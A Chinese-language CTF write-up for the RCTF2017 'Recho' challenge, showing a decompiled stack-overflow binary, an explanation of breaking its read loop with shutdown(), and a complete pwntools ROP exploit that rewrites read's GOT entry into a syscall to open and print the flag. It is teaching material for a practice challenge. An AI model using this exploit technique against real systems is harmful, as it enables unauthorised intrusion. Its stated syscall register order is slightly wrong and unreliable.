RCTF2017之Recho

作者: bluecake | 来源:发表于2017-05-26 22:59 被阅读0次

RCTF2017之Recho
RCTF2017赛后总结
【攻防世界】高手进阶区 Recho WP
十之
读记|唐诗人：诗心煎红尘（二）
《寄君归》
飘零
《美》
众说纷云
安沨

这道题到比赛结束时还是一脸懵逼，看了writeup才知道其实自己的思路已经接近了，不过还是有一些需要注意的点。
看一下主程序吧：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  Init(*(_QWORD *)&argc, argv, envp);
  write(1, "Welcome to Recho server!\n", 0x19uLL);
  while ( read(0, &nptr, 0x10uLL) > 0 )
  {
    v7 = atoi(&nptr);
    if ( v7 <= 15 )
      v7 = 16;
    v6 = read(0, buf, v7);
    buf[v6] = 0;
    printf("%s", buf);
  }
  return 0;
}

很明显的栈溢出，但是有一个问题，这儿有一个死循环：在不断开连接的情况下read的返回值始终大于0（当然，如果我们可以控制read的长度为一个比较大的值，比如0x2000，这个时候再传入比较多的字符串，返回结果就可能为-1）

在当前情况下，唯一退出死循环的方法就只有关闭socket的读通道（对应的，在我们这端为写通道）。比赛的时候就只知道close这么个函数，而一旦调用close，就没有办法再输出数据了。今天的看了writeup，发现还可以调用shutdown函数来单独关闭读或写，有意思。

知道了思路后就是调试了，但如果调用shutdown函数来退出循环，连接很快就会断掉，进一步进程就会被杀死，这对我们的调试是一个很大的障碍。解决办法也比较简单， patch掉产生循环的指令，把ROP调试成功后再去测试shutdown退出循环。

另外一个知识点是int 80，syscenter，syscall这几种方式的传参方法。int 80和syscenter采用的同样的传参顺序：eax，ebx，ecx，edx。但是syscall的传参顺序居然变成了rdi，rsi，rdx，r10，r9，r8。之前一直认为这三种方式采用的是同样的传参方式。

好吧，问题基本就这些。下面是完整的利用脚本

#!/usr/bin/env python
# coding=utf-8

from pwn import *
import time
from socket import *

local = 0
debug = 0
slog = 0

context.log_level= "DEBUG"
context.arch = 'amd64'

def pwn():
    p = remote('127.0.0.1', 4444)
    elf = ELF('./Recho')

    time.sleep(0.5)

    #gdb.attach(pidof('recho')[0], open('debug'))
    p.recvuntil('server!')
    p.sendline('1000')

    time.sleep(0.5)

    '''
    recho
    0x4006fc : pop rax ; ret
    0x4008a3 : pop rdi ; ret
    0x4006fe : pop rdx ; ret
    0x4008a1 : pop rsi ; pop r15 ; ret
    0x40070c : xchg eax, ebx ; add byte ptr [rdi], al ; ret
    '''

    pop_rax = 0x4006fc 
    pop_rdi = 0x4008a3 
    pop_rdx = 0x4006fe 
    pop_rsi_r15 = 0x4008a1 
    xchg_add_rdi_eax = 0x40070c
   
    bss_addr = 0x601000 + 0x100
    payload  = 'a'*0x38 # padding
   
    # change read to syscall
    payload += p64(pop_rax) + p64(0xe)
    payload += p64(pop_rdi) + p64(elf.got['read']) 
    payload += p64(xchg_add_rdi_eax)
    payload += p64(xchg_add_rdi_eax)
   
    # fd = open('flag')
    payload += p64(pop_rax) + p64(int(constants.SYS_open))
    payload += p64(pop_rdi) + p64(elf.symbols['flag']) 
    payload += p64(pop_rsi_r15) + p64(0) + p64(0xdeadbeef)
    payload += p64(pop_rdx) + p64(0) + p64(elf.plt['read'])

    # read(fd, bss_addr, 100)
    payload += p64(pop_rax) + p64(int(constants.SYS_read))
    payload += p64(pop_rdi) + p64(5)  # in my system kali 2.0, fd is 5 
                                      # in remote machine, it may not be this
                                      # but won't be very large
    payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
    payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])

    # write(fd, bss_addr, 100)
    payload += p64(pop_rax) + p64(int(constants.SYS_write))
    payload += p64(pop_rdi) + p64(1)
    payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
    payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])
    p.sendline(payload)

    p.shutdown("write")
    p.interactive()

if __name__ == "__main__":
    pwn()